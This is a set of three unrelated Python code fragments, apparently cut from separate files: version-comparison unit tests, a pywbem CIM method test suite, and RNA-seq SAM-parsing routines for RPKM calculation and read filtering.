v1 = Version('foo', 1, 1, 1)
v2 = Version('foo', 1, 1, 2)
assert(v1 != v2)
assert(v2 != v1)
v1 = Version('foo', 1, 1, '1test')
v2 = Version('foo', 1, 1, '1frob')
assert(v1 != v2)
assert(v2 != v1)
v1 = Version('foo', 1, 1, '1test5')
v2 = Version('foo', 1, 1, '1test6')
assert(v1 != v2)
assert(v2 != v1)
v1 = Version('foo', 1, 1, 'test5')
v2 = Version('foo', 1, 1, 'test6')
assert(v1 != v2)
assert(v2 != v1)
v1 = Version('foo', 1, 1, 'test')
v2 = Version('foo', 1, 1, 'frob')
assert(v1 != v2)
assert(v2 != v1)
# Ordering
v1 = Version(major=0)
v2 = Version(major=1)
assert(v1 < v2)
assert(v2 > v1)
v1 = Version('foo', 1)
v2 = Version('foo', 2)
assert(v1 < v2)
assert(v2 > v1)
v1 = Version('foo', 1, None)
v2 = Version('foo', 1, 1)
assert(v1 < v2)
assert(v2 > v1)
v1 = Version('foo', 1, 1)
v2 = Version('foo', 1, 2)
assert(v1 < v2)
assert(v2 > v1)
v1 = Version('foo', 1, 2)
v2 = Version('foo', 2, 1)
assert(v1 < v2)
assert(v2 > v1)
v1 = Version('foo', 1, 1, 1)
v2 = Version('foo', 1, 1, 2)
assert(v1 < v2)
assert(v2 > v1)
v1 = Version('foo', 1, 1, 2)
v2 = Version('foo', 1, 2, 1)
assert(v1 < v2)
assert(v2 > v1)
v1 = Version('foo', 1, 2, 1)
v2 = Version('foo', 2, 1, 1)
assert(v1 < v2)
assert(v2 > v1)
v1 = Version('foo', 1, 1, 'rc0')
v2 = Version('foo', 1, 1, 'rc1')
assert(v1 < v2)
assert(v2 > v1)
v1 = Version('foo', 1, 1, '1-rc1')
v2 = Version('foo', 1, 1, 1)
assert(v1 < v2)
assert(v2 > v1)
v1 = Version('foo', 1, 1, 'rc0')
v2 = Version('foo', 1, 1, '1rc0')
assert(v1 < v2)
assert(v2 > v1)
v1 = Version('foo', 1, 1, '1rc0')
v2 = Version('foo', 1, 1, '1rc1')
assert(v1 < v2)
assert(v2 > v1)
v1 = Version('foo', 1, 1, '1rc1')
v2 = Version('foo', 1, 1, '2rc0')
assert(v1 < v2)
assert(v2 > v1)
v1 = Version('foo', 1, 1, '1rc1')
v2 = Version('foo', 1, 2, '1rc1')
assert(v1 < v2)
assert(v2 > v1)
v1 = Version('foo', 1, 2, '1rc1')
v2 = Version('foo', 2, 1, '1rc1')
assert(v1 < v2)
assert(v2 > v1)
v1 = Version('foo', 1, 1, 'rc1')
v2 = Version('foo', 1, 1)
assert(v1 < v2)
assert(v2 > v1)
def test_compare_typical():
# Normal usage
v1 = Version.parse('linux-2.4.6')
v2 = Version.parse('linux-2.4.8')
v3 = Version.parse('linux-2.4.10-rc1') # rc < version proper
v4 = Version.parse('linux-2.4.10')
v5 = Version.parse('linux-2.6.27.10')
v6 = Version.parse('linux-2.6.27.11')
v7 = Version.parse('linux-3.0')
v8 = Version.parse('linux-3.0.1')
v9 = Version.parse('linux-3.0.65')
v10 = Version.parse('linux-3.0.65.1')
v11 = Version.parse('linux-4.x')
v12 = Version.parse('linux-5.X')
assert(v1 < v2)
assert(v2 > v1)
assert(v1 != v2)
assert(v2 != v1)
# Make sure rc compare ABOVE lower version without patch_str
assert(v2 < v3)
assert(v3 > v2)
assert(v2 != v3)
assert(v3 != v2)
assert(v3 < v4)
assert(v4 > v3)
assert(v3 != v4)
assert(v4 != v3)
assert(v4 < v5)
assert(v5 > v4)
assert(v4 != v5)
assert(v5 != v4)
assert(v5 < v6)
assert(v6 > v5)
assert(v5 != v6)
assert(v6 != v5)
assert(v6 < v7)
assert(v7 > v6)
assert(v6 != v7)
assert(v7 != v6)
assert(v7 < v8)
assert(v8 > v7)
assert(v7 != v8)
assert(v8 != v7)
assert(v8 < v9)
assert(v9 > v8)
assert(v8 != v9)
assert(v9 != v8)
assert(v9 < v10)
assert(v10 > v9)
assert(v9 != v10)
assert(v10 != v9)
assert(v10 < v11)
assert(v11 > v10)
assert(v10 != v11)
assert(v11 != v10)
assert(v11 < v12)
assert(v12 > v11)
assert(v11 != v12)
assert(v12 != v11)
l = sorted([v12, v11, v10, v9, v8, v7, v6, v5, v4, v3, v2, v1])
for i in range(10):
assert(l[0] == v1)
assert(l[1] == v2)
assert(l[2] == v3)
assert(l[3] == v4)
assert(l[4] == v5)
assert(l[5] == v6)
assert(l[6] == v7)
assert(l[7] == v8)
assert(l[8] == v9)
assert(l[9] == v10)
assert(l[10] == v11)
assert(l[11] == v12)
random.shuffle(l)
l.sort()
# TODO compare for
# 1.71 (decimal) < 1.8
def test_wildcards():
for char in ['x', 'X', '*']:
# Equality
v1 = Version(major=char)
v2 = Version(major=1)
assert(v1 == v2)
assert(v2 == v1)
# wildcard implies wildcard for any lesser fields
v1 = Version(major=char)
v2 = Version(major=1, minor=1)
assert(v1 == v2)
assert(v2 == v1)
v2 = Version(major=1, minor=1, patch='1.1')
assert(v1 == v2)
assert(v2 == v1)
v1 = Version(major=char, minor=char)
assert(v1 == v2)
assert(v2 == v1)
v1 = Version(major=0, minor=char)
v2 = Version(major=0, minor=0)
assert(v1 == v2)
assert(v2 == v1)
v1 = Version(major=0, minor=0, patch=char)
v2 = Version(major=0, minor=0, patch=0)
assert(v1 == v2)
assert(v2 == v1)
v1 = Version(major=0, minor=char, patch=0)
v2 = Version(major=0, minor=9, patch=0)
assert(v1 == v2)
assert(v2 == v1)
v2 = Version(major=0, minor=1, patch=0)
assert(v1 == v2)
assert(v2 == v1)
v2 = Version(major=0, minor=char, patch=0)
assert(v1 == v2)
assert(v2 == v1)
v1 = Version(major=0, minor=0, patch=char)
v2 = Version(major=0, minor=0, patch='1.5')
assert(v1 == v2)
assert(v2 == v1)
v1 = Version(major=0, minor=0, patch='1.'+char)
v2 = Version(major=0, minor=0, patch='1.5')
assert(v1 == v2)
assert(v2 == v1)
v1 = Version(major=0, minor=0, patch=char+'.5')
v2 = Version(major=0, minor=0, patch='1.5')
| |
<gh_stars>1-10
#!/usr/bin/env python
#import gmetaddata as gmetad
#import gmonddata as gmond
import optparse
import pywbem
from lib import wbem_connection
#import telnetlib as telnet
#import elementtree.ElementTree as ET
#import socket
import unittest
import os
import shutil
import random
import sys
real_tolerance = 0.01
conn = None
#This test requires the usage of elementtree
_g_opts = None
_g_args = None
def _typed_randrange(lo, hi, type):
if type == 'sint8':
return pywbem.Sint8(random.randrange(pywbem.Sint8(lo), pywbem.Sint8(hi)))
elif type == 'sint16':
return pywbem.Sint16(random.randrange(pywbem.Sint16(lo), pywbem.Sint16(hi)))
elif type == 'sint32':
return pywbem.Sint32(random.randrange(pywbem.Sint32(lo), pywbem.Sint32(hi)))
elif type == 'sint64':
return pywbem.Sint64(random.randrange(pywbem.Sint64(lo), pywbem.Sint64(hi)))
elif type == 'uint8':
return pywbem.Uint8(random.randrange(pywbem.Uint8(lo), pywbem.Uint8(hi)))
elif type == 'uint16':
return pywbem.Uint16(random.randrange(pywbem.Uint16(lo), pywbem.Uint16(hi)))
elif type == 'uint32':
return pywbem.Uint32(random.randrange(pywbem.Uint32(lo), pywbem.Uint32(hi)))
elif type == 'uint64':
return pywbem.Uint64(random.randrange(pywbem.Uint64(lo), pywbem.Uint64(hi)))
elif type == 'real32':
return pywbem.Real32(random.randrange(pywbem.Real32(lo), pywbem.Real32(hi)))
elif type == 'real64':
return pywbem.Real64(random.randrange(pywbem.Real64(lo), pywbem.Real64(hi)))
################################################################################
class TestMethods(unittest.TestCase):
limits = {'sint8_min':pywbem.Sint8(-128),
'sint8_max':pywbem.Sint8(127),
'sint16_min':pywbem.Sint16(-32768),
'sint16_max':pywbem.Sint16(32767),
'sint32_min':pywbem.Sint32(-2147483648),
'sint32_max':pywbem.Sint32(2147483647),
'sint64_min':pywbem.Sint64(-92233736854775808L),
'sint64_max':pywbem.Sint64(9223372036854775807L),
'uint8_min':pywbem.Uint8(0),
'uint8_max':pywbem.Uint8(0xFF),
'uint16_min':pywbem.Uint16(0),
'uint16_max':pywbem.Uint16(0xFFFF),
'uint32_min':pywbem.Uint32(0),
'uint32_max':pywbem.Uint32(0xFFFFFFFF),
'uint64_min':pywbem.Uint64(0L),
'uint64_max':pywbem.Uint64(0x7FFFFFFFFFFFFFFFL),
'real32_min':pywbem.Real32(-123456.78),
'real32_max':pywbem.Real32(123456.78),
'real64_min':pywbem.Real64(-12345678987654.32),
'real64_max':pywbem.Real64(12345678987654.32)}
# note: the last Uint64 value should be 0xFFFFFFFFFFFFFFFF but there is a bug somewhere...
inttypes = ['sint8', 'sint16', 'sint32', 'sint64', 'uint8', 'uint16', 'uint32', 'uint64']
realtypes = ['real32', 'real64']
zeros = {'sint8':pywbem.Sint8(0),
'sint16':pywbem.Sint16(0),
'sint32':pywbem.Sint32(0),
'sint64':pywbem.Sint64(0),
'uint8':pywbem.Uint8(0),
'uint16':pywbem.Uint16(0),
'uint32':pywbem.Uint32(0),
'uint64':pywbem.Uint64(0),
'real32':pywbem.Real32(0),
'real64':pywbem.Real64(0)}
ones = {'sint8':pywbem.Sint8(1),
'sint16':pywbem.Sint16(1),
'sint32':pywbem.Sint32(1),
'sint64':pywbem.Sint64(1),
'uint8':pywbem.Uint8(1),
'uint16':pywbem.Uint16(1),
'uint32':pywbem.Uint32(1),
'uint64':pywbem.Uint64(1),
'real32':pywbem.Real32(0),
'real64':pywbem.Real64(0)}
tens = {'sint8':pywbem.Sint8(10),
'sint16':pywbem.Sint16(10),
'sint32':pywbem.Sint32(10),
'sint64':pywbem.Sint64(10),
'uint8':pywbem.Uint8(10),
'uint16':pywbem.Uint16(10),
'uint32':pywbem.Uint32(10),
'uint64':pywbem.Uint64(10),
'real32':pywbem.Real32(10),
'real64':pywbem.Real64(10)}
twenties = {'sint8':pywbem.Sint8(20),
'sint16':pywbem.Sint16(20),
'sint32':pywbem.Sint32(20),
'sint64':pywbem.Sint64(20),
'uint8':pywbem.Uint8(20),
'uint16':pywbem.Uint16(20),
'uint32':pywbem.Uint32(20),
'uint64':pywbem.Uint64(20),
'real32':pywbem.Real32(20),
'real64':pywbem.Real64(20)}
numlists = {
'sint8':[pywbem.Sint8(8), pywbem.Sint8(2), pywbem.Sint8(5),
pywbem.Sint8(6), pywbem.Sint8(3), pywbem.Sint8(9),
pywbem.Sint8(7), pywbem.Sint8(1), pywbem.Sint8(4)],
'sint16':[pywbem.Sint16(8), pywbem.Sint16(2), pywbem.Sint16(5),
pywbem.Sint16(6), pywbem.Sint16(3), pywbem.Sint16(9),
pywbem.Sint16(7), pywbem.Sint16(1), pywbem.Sint16(4)],
'sint32':[pywbem.Sint32(8), pywbem.Sint32(2), pywbem.Sint32(5),
pywbem.Sint32(6), pywbem.Sint32(3), pywbem.Sint32(9),
pywbem.Sint32(7), pywbem.Sint32(1), pywbem.Sint32(4)],
'sint64':[pywbem.Sint64(8), pywbem.Sint64(2), pywbem.Sint64(5),
pywbem.Sint64(6), pywbem.Sint64(3), pywbem.Sint64(9),
pywbem.Sint64(7), pywbem.Sint64(1), pywbem.Sint64(4)],
'uint8':[pywbem.Uint8(8), pywbem.Uint8(2), pywbem.Uint8(5),
pywbem.Uint8(6), pywbem.Uint8(3), pywbem.Uint8(9),
pywbem.Uint8(7), pywbem.Uint8(1), pywbem.Uint8(4)],
'uint16':[pywbem.Uint16(8), pywbem.Uint16(2), pywbem.Uint16(5),
pywbem.Uint16(6), pywbem.Uint16(3), pywbem.Uint16(9),
pywbem.Uint16(7), pywbem.Uint16(1), pywbem.Uint16(4)],
'uint32':[pywbem.Uint32(8), pywbem.Uint32(2), pywbem.Uint32(5),
pywbem.Uint32(6), pywbem.Uint32(3), pywbem.Uint32(9),
pywbem.Uint32(7), pywbem.Uint32(1), pywbem.Uint32(4)],
'uint64':[pywbem.Uint64(8), pywbem.Uint64(2), pywbem.Uint64(5),
pywbem.Uint64(6), pywbem.Uint64(3), pywbem.Uint64(9),
pywbem.Uint64(7), pywbem.Uint64(1), pywbem.Uint64(4)],
'real32':[pywbem.Real32(8), pywbem.Real32(2), pywbem.Real32(5),
pywbem.Real32(6), pywbem.Real32(3), pywbem.Real32(9),
pywbem.Real32(7), pywbem.Real32(1), pywbem.Real32(4)],
'real64':[pywbem.Real64(8), pywbem.Real64(2), pywbem.Real64(5),
pywbem.Real64(6), pywbem.Real64(3), pywbem.Real64(9),
pywbem.Real64(7), pywbem.Real64(1), pywbem.Real64(4)]}
def _dbgPrint(self, msg=''):
if self._verbose:
if len(msg):
print('\t -- %s --' % msg)
else:
print('')
def setUp(self):
unittest.TestCase.setUp(self)
self.conn = conn
self.conn.debug = True
for iname in self.conn.EnumerateInstanceNames('Test_Method'):
self.conn.DeleteInstance(iname)
self._verbose = _g_opts.verbose
self._dbgPrint()
def tearDown(self):
unittest.TestCase.tearDown(self)
for iname in self.conn.EnumerateInstanceNames('Test_Method'):
self.conn.DeleteInstance(iname)
def _run_and_validate_getrand(self,
type,
methodName,
min,
max,
expectedReturnValue=None,
minReturnValue=None,
maxReturnValue=None):
isRealType = False
if type.startswith('real'):
isRealType = True
if isRealType:
self._dbgPrint('Testing %s invocation with min=%f, max=%f' % (methodName, min, max))
else:
self._dbgPrint('Testing %s invocation with min=%d, max=%d' % (methodName, min, max))
(rv, oparams) = self.conn.InvokeMethod(methodName, 'Test_Method', min=min, max=max)
if not oparams['success']:
self.fail('"Success" reported as false for invocation of method %s' % methodName)
if expectedReturnValue is not None:
if isRealType:
self._dbgPrint('Verifying return value (%f) equal to expected return value %f...' % (rv, expectedReturnValue))
if abs(expectedReturnValue - rv) > real_tolerance:
self.fail('Return value not as expected for invocation of method %s' % methodName)
else:
self._dbgPrint('Verifying return value (%d) equal to expected return value %d...' % (rv, expectedReturnValue))
if expectedReturnValue != rv:
self.fail('Return value not as expected for invocation of method %s' % methodName)
self._dbgPrint('Return value is as expected.')
if minReturnValue is not None:
if isRealType:
self._dbgPrint('Verifying return value (%f) >= %f' % (rv, minReturnValue))
else:
self._dbgPrint('Verifying return value (%d) >= %d' % (rv, minReturnValue))
if rv < minReturnValue:
self.fail('Return value less than expected for invocation of method %s' % methodName)
self._dbgPrint('Return value is as expected.')
if maxReturnValue is not None:
if isRealType:
self._dbgPrint('Verifying return value (%f) <= %f' % (rv, maxReturnValue))
else:
self._dbgPrint('Verifying return value (%d) <= %d' % (rv, maxReturnValue))
if rv > maxReturnValue:
self.fail('Return value greater than expected for invocation of method %s' % methodName)
self._dbgPrint('Return value is as expected.')
def _run_and_validate_getrandlist(self,
type,
methodName,
min,
max,
nelems):
isRealType = False
if type.startswith('real'):
isRealType = True
if isRealType:
self._dbgPrint('Testing %s invocation with min=%f, max=%f' % (methodName, min, max))
else:
self._dbgPrint('Testing %s invocation with min=%d, max=%d' % (methodName, min, max))
(rv, oparams) = self.conn.InvokeMethod(methodName, 'Test_Method', lo=min, hi=max, nelems=nelems)
if not rv:
self.fail('Invocation of %s returned false success value.' % methodName)
self._dbgPrint('Invocation of %s returned successfully.' % methodName)
if isRealType:
self._dbgPrint('Validating lo (%f) and hi (%f) outparams...' % (min, max))
if abs(oparams['lo'] - min) > real_tolerance:
self.fail('Returned low range value (%f) not equal to specified value (%f).' % (oparams['lo'], min))
if abs(oparams['hi'] - max) > real_tolerance:
self.fail('Returned high range value (%f) not equal to specified value (%f).' % (oparams['hi'], max))
else:
self._dbgPrint('Validating lo (%d) and hi (%d) outparams...' % (min, max))
if oparams['lo'] != min:
self.fail('Returned low range value (%d) not equal to specified value (%d).' % (oparams['lo'], min))
if oparams['hi'] != max:
self.fail('Returned high range value (%d) not equal to specified value (%d).' % (oparams['hi'], max))
self._dbgPrint('Lo and hi outparams validated successfully.')
self._dbgPrint('Validating random list values...')
if oparams['nlist'] is None:
self.fail('Expected a list of values but got none.')
if len(oparams['nlist']) != nelems:
self.fail('Expected a list of %d items but got %d items instead.' % (nelems, len(oparams['nlist'])))
minkey = '%s_min' % type
maxkey = '%s_max' % type
for num in oparams['nlist']:
if num < TestMethods.limits[minkey] or \
num > TestMethods.limits[maxkey]:
if isRealType:
self.fail('List element %f not in expected range for type %s.' % (num, type))
else:
self.fail('List element %d not in expected range for type %s.' % (num, type))
self._dbgPrint('Random list values validated successfully.')
def _run_and_validate_minmedmax(self, type, methodName, numlist):
self._dbgPrint('Testing %s invocation' % methodName)
(rv, oparams) = self.conn.InvokeMethod(methodName, 'Test_Method', numlist=numlist)
if not rv:
self.fail('Invocation of %s returned false success value.' % methodName)
self._dbgPrint('Invocation of %s returned successfully.' % methodName)
self._dbgPrint('Validating min, median, and max outparams...')
if oparams['min'] != 1:
self.fail('Expected min of 1 but instead got %d' % oparams['min'])
if oparams['max'] != 9:
self.fail('Expected max of 9 but instead got %d' % oparams['max'])
if oparams['med'] != 5:
self.fail('Expected median of 5 but instead got %d' % oparams['med'])
self._dbgPrint('Min, median, and max values validated successfully.')
def _run_numeric_type_tests(self, typelist):
gr = self._run_and_validate_getrand
grl = self._run_and_validate_getrandlist
mmm = self._run_and_validate_minmedmax
for type in typelist:
method = 'genRand_%s' % type
minkey = '%s_min' % type
maxkey = '%s_max' % type
min = TestMethods.limits[minkey]
max = TestMethods.limits[maxkey]
gr(type, method, min, max, None, min, max)
gr(type, method, min, min, min)
gr(type, method, max, max, max)
if min != 0:
gr(type, method, TestMethods.zeros[type], TestMethods.zeros[type], TestMethods.zeros[type])
gr(type, method, TestMethods.tens[type], TestMethods.twenties[type], None, TestMethods.tens[type], TestMethods.twenties[type])
# the next two should cause exceptions; getting a TypeError exception is not an error in this case.
try:
gr(type, method, min-1, min-1, min-1)
except TypeError:
pass
try:
gr(type, method, max+1, max+1, max+1)
except TypeError:
pass
method = 'genRandList_%s' % type
nelems = _typed_randrange(TestMethods.tens[type], TestMethods.twenties[type], type)
grl(type, method, min, max, nelems)
grl(type, method, min, max, TestMethods.ones[type])
grl(type, method, min, max, TestMethods.zeros[type])
if min != 0:
grl(type, method, TestMethods.zeros[type], max, nelems)
else:
grl(type, method, min, TestMethods.zeros[type], nelems)
grl(type, method, TestMethods.tens[type], TestMethods.twenties[type], nelems)
grl(type, method, TestMethods.tens[type], TestMethods.twenties[type], TestMethods.ones[type])
grl(type, method, TestMethods.tens[type], TestMethods.twenties[type], TestMethods.zeros[type])
method = 'minmedmax_%s' % type
mmm(type, method, TestMethods.numlists[type])
def test_integer_types(self):
self._run_numeric_type_tests(TestMethods.inttypes)
def test_real_types(self):
self._run_numeric_type_tests(TestMethods.realtypes)
def test_refs(self):
inst = pywbem.CIMInstance('Test_Method', properties={
'id':'one',
'p_str':'One',
'p_sint32':pywbem.Sint32(1)})
self.conn.CreateInstance(inst)
iname = pywbem.CIMInstanceName('Test_Method', namespace='root/cimv2',
keybindings={'id':'one'})
rv, outs = self.conn.InvokeMethod('getStrProp', iname)
self.assertEquals(rv, 'One')
rv, outs = self.conn.InvokeMethod('setStrProp', iname, value='won')
self.assertFalse(outs)
self.assertEquals(rv, 'One')
rv, outs = self.conn.InvokeMethod('getStrProp', iname)
self.assertEquals(rv, 'won')
inst = self.conn.GetInstance(iname)
self.assertEquals(inst['p_str'], 'won')
rv, outs = self.conn.InvokeMethod('getIntProp', iname)
self.assertEquals(rv, 1)
self.assertTrue(isinstance(rv, pywbem.Sint32))
self.assertEquals(inst['p_sint32'], 1)
rv, outs = self.conn.InvokeMethod('setIntProp', iname,
value=pywbem.Sint32(2))
self.assertTrue(isinstance(rv, pywbem.Sint32))
self.assertEquals(rv, 1)
self.assertFalse(outs)
rv, outs = self.conn.InvokeMethod('getIntProp', iname)
self.assertEquals(rv, 2)
self.assertTrue(isinstance(rv, pywbem.Sint32))
inst = self.conn.GetInstance(iname)
self.assertEquals(inst['p_sint32'], 2)
rv, outs = self.conn.InvokeMethod('getObjectPath', 'Test_Method')
self.assertTrue(isinstance(outs['path'], pywbem.CIMInstanceName))
self.assertEquals(outs['path']['id'], 'one')
inst = pywbem.CIMInstance('Test_Method', properties={
'id':'two',
'p_str':'Two',
'p_sint32':pywbem.Sint32(2)})
self.conn.CreateInstance(inst)
rv, outs = self.conn.InvokeMethod('getObjectPaths', 'Test_Method')
self.assertEquals(len(outs['paths']), 2)
self.assertTrue(isinstance(outs['paths'][0], pywbem.CIMInstanceName))
to_delete = outs['paths']
inst = pywbem.CIMInstance('Test_Method', properties={
'id':'three',
'p_str':'Three',
'p_sint32':pywbem.Sint32(3)})
self.conn.CreateInstance(inst)
iname = pywbem.CIMInstanceName('Test_Method', namespace='root/cimv2',
keybindings={'id':'three'})
inames = self.conn.EnumerateInstanceNames('Test_Method')
self.assertEquals(len(inames), 3)
rv, outs = self.conn.InvokeMethod('delObject', 'Test_Method',
path=iname)
inames = self.conn.EnumerateInstanceNames('Test_Method')
self.assertEquals(len(inames), 2)
self.conn.CreateInstance(inst)
''' # OpenWBEM is broken! uncomment this for Pegasus. '''
rv, outs = self.conn.InvokeMethod('delObjects', 'Test_Method',
paths=to_delete)
inames | |
exon_ranges:
exon_ranges[chrom] = Intersecter()
exon_ranges[chrom].add_interval( Interval( st, end ) )
#read SAM
print >>sys.stderr, "reading "+ self.fileName + '...',
for line in self.f:
if line.startswith("@"):continue
fields=line.rstrip('\n ').split()
flagCode=string.atoi(fields[1])
if (flagCode & 0x0004) != 0: continue #skip unmap reads
totalReads +=1
if not ParseSAM._uniqueHit_pat.search(line): #skip multiple mapped reads
multiMapReads +=1
continue
chrom = fields[2].upper()
chromStart = string.atoi(fields[3])-1
comb=[int(i) for i in ParseSAM._splicedHit_pat.findall(fields[5])] #"9M4721N63M3157N8M" return ['9', '4721', '63', '3157', '8']
#cUR += (len(comb) +1)/2
if(len(comb)>1):
sR+=1
blockStart=[]
blockSize=[]
for i in range(0,len(comb),2):
blockStart.append(chromStart + sum(comb[:i]) )
for i in range(0,len(comb),2):
blockSize.append(comb[i])
#build bitset only for exonic reads
for st,size in zip(blockStart,blockSize):
if (chrom in exon_ranges) and (len(exon_ranges[chrom].find(st,st+size)) >0): #if we found this fragment is overlapped with exon
cUR += 1
mid = int(st) + (size/2)
if chrom not in ranges:
ranges[chrom] = Intersecter()
ranges[chrom].add_interval( Interval( mid, mid ) )
else: #if this framgnet is intronic, skip it.
#intronic +=1
continue
self.f.seek(0)
print >>sys.stderr, "Done"
print >>RPKM_OUT, "Total mapped reads (TR): " + str(totalReads)
print >>RPKM_OUT, "Multiple mapped reads (MR): " + str(multiMapReads)
print >>RPKM_OUT, "Uniquely mapped reads (UR): " + str(totalReads - multiMapReads)
print >>RPKM_OUT, "Spliced mapped reads (SR): " + str(sR)
print >>RPKM_OUT, "Corrected uniquely mapped reads (cUR, non-intronic fragments): " + str(cUR)
#print >>RPKM_OUT, "Intronic Fragments (IF): " + str(intronic)
if totalReads ==0:
sys.exit(1)
#read refbed file
print >>sys.stderr, "Assign reads to "+ refbed + '...',
for line in open(refbed,'r'):
try:
if line.startswith('#'):continue
if line.startswith('track'):continue
if line.startswith('browser'):continue
# Parse fields from gene tabls
fields = line.split()
chrom = fields[0].upper()
tx_start = int( fields[1] )
tx_end = int( fields[2] )
geneName = fields[3]
strand = fields[5].replace(" ","_")
exon_starts = map( int, fields[11].rstrip( ',\n' ).split( ',' ) )
exon_starts = map((lambda x: x + tx_start ), exon_starts)
exon_ends = map( int, fields[10].rstrip( ',\n' ).split( ',' ) )
exon_ends = map((lambda x, y: x + y ), exon_starts, exon_ends)
exon_sizes = map(int,fields[10].rstrip(',\n').split(','))
intron_starts = exon_ends[:-1]
intron_ends=exon_starts[1:]
key='\t'.join((chrom.lower(),str(tx_start),str(tx_end),geneName,'0',strand))
except:
print >>sys.stderr,"[NOTE:input bed must be 12-column] skipped this line: " + line,
continue
# assign reads to intron
mRNA_count=0
mRNA_len=sum(exon_sizes)
if(strand == '-'):
intronNum=len(intron_starts)
exonNum=len(exon_starts)
for st,end in zip(intron_starts,intron_ends):
if chrom in ranges:
hits= len(ranges[chrom].find(st,end))
RPKM_OUT.write(chrom.lower() + "\t" + str(st) + "\t" + str(end) + "\t" + geneName + "_intron_" + str(intronNum) + "\t" + str(hits) + "\t" + strand + '\t' + str(hits*1000000000.0/((end-st)*(cUR))) +'\n')
intronNum -= 1
for st,end in zip(exon_starts,exon_ends):
if chrom in ranges:
hits= len(ranges[chrom].find(st,end))
RPKM_OUT.write(chrom.lower() + "\t" + str(st) + "\t" + str(end) + "\t" + geneName + "_exon_" + str(exonNum) + "\t" + str(hits) + "\t" + strand + '\t' + str(hits*1000000000.0/((end-st)*(cUR))) +'\n')
exonNum -= 1
mRNA_count += hits
try:
RPKM_OUT.write(chrom.lower() + "\t" + str(tx_start) + "\t" + str(tx_end) + "\t" + geneName + "_mRNA" + "\t" + str(mRNA_count) + "\t" + strand + '\t' + str(mRNA_count*1000000000.0/(mRNA_len*cUR)) +'\n')
rpkm[key] = mRNA_count*1000000000.0/(mRNA_len*cUR)
except:
RPKM_OUT.write(chrom.lower() + "\t" + str(tx_start) + "\t" + str(tx_end) + "\t" + geneName + "_mRNA" + "\t" + str(0) + "\t" + strand + '\t' + str(0) +'\n')
rpkm[key] = 0
elif(strand == '+'):
intronNum=1
exonNum=1
for st,end in zip(intron_starts,intron_ends):
if chrom in ranges:
hits= len(ranges[chrom].find(st,end))
RPKM_OUT.write(chrom.lower() + "\t" + str(st) + "\t" + str(end) + "\t" + geneName + "_intron_" + str(intronNum) + "\t" + str(hits) + "\t" + strand + '\t' + str(hits*1000000000.0/((end-st)*(cUR))) +'\n')
intronNum += 1
for st,end in zip(exon_starts,exon_ends):
if chrom in ranges:
hits= len(ranges[chrom].find(st,end))
RPKM_OUT.write(chrom.lower() + "\t" + str(st) + "\t" + str(end) + "\t" + geneName + "_exon_" + str(exonNum) + "\t" + str(hits) + "\t" + strand + '\t' + str(hits*1000000000.0/((end-st)*(cUR))) +'\n')
exonNum += 1
mRNA_count += hits
try:
RPKM_OUT.write(chrom.lower() + "\t" + str(tx_start) + "\t" + str(tx_end) + "\t" + geneName + "_mRNA" + "\t" + str(mRNA_count) + "\t" + strand + '\t' + str(mRNA_count*1000000000.0/(mRNA_len*cUR)) +'\n')
rpkm[key] = mRNA_count*1000000000.0/(mRNA_len*cUR)
except:
RPKM_OUT.write(chrom.lower() + "\t" + str(tx_start) + "\t" + str(tx_end) + "\t" + geneName + "_mRNA" + "\t" + str(0) + "\t" + strand + '\t' + str(0) +'\n')
rpkm[key] = 0
print >>sys.stderr, "Done"
return rpkm
self.f.seek(0)
def filterKnownReads(self,refbed,outfile=None):
'''Compare SAM files with reference gene model, all reads mapped to gene model will be filted
out. The remainning unknown reads will be writtern to a new SAM file'''
totalReads=0 #total mapped reads
unknownReads=0
ranges={}
if refbed is None:
print >>sys.stderr,"You must specify a bed file representing gene model\n"
exit(0)
if outfile is None:
out_file = self.fileName + ".unknownReads.SAM"
else:
out_file = outfile + ".unknownReads.SAM"
OUT=open(out_file,'w')
print >>sys.stderr, "Reading reference gene model "+ refbed + '...'
for line in open(refbed,'r'):
try:
if line.startswith(('#','track','browser')):continue
# Parse fields from gene tabls
fields = line.split()
chrom = fields[0].upper()
tx_start = int( fields[1] )
tx_end = int( fields[2] )
geneName = fields[3]
strand = fields[5].replace(" ","_")
exon_starts = map( int, fields[11].rstrip( ',\n' ).split( ',' ) )
exon_starts = map((lambda x: x + tx_start ), exon_starts)
exon_ends = map( int, fields[10].rstrip( ',\n' ).split( ',' ) )
exon_ends = map((lambda x, y: x + y ), exon_starts, exon_ends);
except:
print >>sys.stderr,"[NOTE:input bed must be 12-column] skipped this line: " + line,
continue
for st,end in zip(exon_starts,exon_ends):
if chrom not in ranges:
ranges[chrom] = Intersecter()
ranges[chrom].add_interval( Interval( st, end ) )
print >>sys.stderr, "Processing SAM file "+ self.fileName + '...'
for line in self.f:
if line.startswith("@"):continue
fields=line.rstrip('\n ').split()
flagCode=string.atoi(fields[1])
if (flagCode & 0x0004) != 0: continue #skip unmap reads
if not ParseSAM._uniqueHit_pat.search(line): #skip multiple mapped reads
continue
blockStart=[]
blockSize=[]
totalReads +=1
chrom = fields[2].upper()
chromStart = string.atoi(fields[3])-1
comb=[int(i) for i in ParseSAM._splicedHit_pat.findall(fields[5])] #"9M4721N63M3157N8M" return ['9', '4721', '63', '3157', '8']
for i in range(0,len(comb),2):
blockStart.append(chromStart + sum(comb[:i]) )
for i in range(0,len(comb),2):
blockSize.append(comb[i])
for st,size in zip(blockStart,blockSize):
if (chrom in ranges) and (len(ranges[chrom].find(st,st+size)) >0): #if we found this read is overlapped with known gene
break
else:
OUT.write(line)
unknownReads +=1
OUT.close()
print >>sys.stderr, "Total reads mapped to genome: " + str(totalReads)
print >>sys.stderr, "Total reads not overlapped with any exon: " + str(unknownReads)
self.f.seek(0)
def genomicFragSize(self,outfile=None,low_bound=0,up_bound=1000,step=10):
'''estimate the genomic fragment size of mRNA experiment. fragment size = insert_size + 2 x read_length'''
if outfile is None:
out_file1 = self.fileName + ".fragSize.txt"
out_file2 = self.fileName + ".fragSize.Freq.txt"
out_file3 = self.fileName + ".fragSize_plot.r"
else:
out_file1 = outfile + ".fragSize.txt"
out_file2 = outfile + ".fragSize.Freq.txt"
out_file3 = outfile + ".fragSize_plot.r"
FO=open(out_file1,'w')
FQ=open(out_file2,'w')
RS=open(out_file3,'w')
chrom="chr100" #this is the fake chromosome
ranges={}
ranges[chrom]=Intersecter()
window_left_bound = range(low_bound,up_bound,step)
frag_size=0
pair_num=0.0
ultra_low=0.0
ultra_high=0.0
size=[]
counts=[]
count=0
print >>sys.stderr, "Reading SAM file "+ self.fileName + ' ... ',
for line in self.f:
if line.startswith("@"):continue
fields=line.rstrip('\n ').split()
#if fields[0] in pairRead_info:
# continue
flagCode=string.atoi(fields[1])
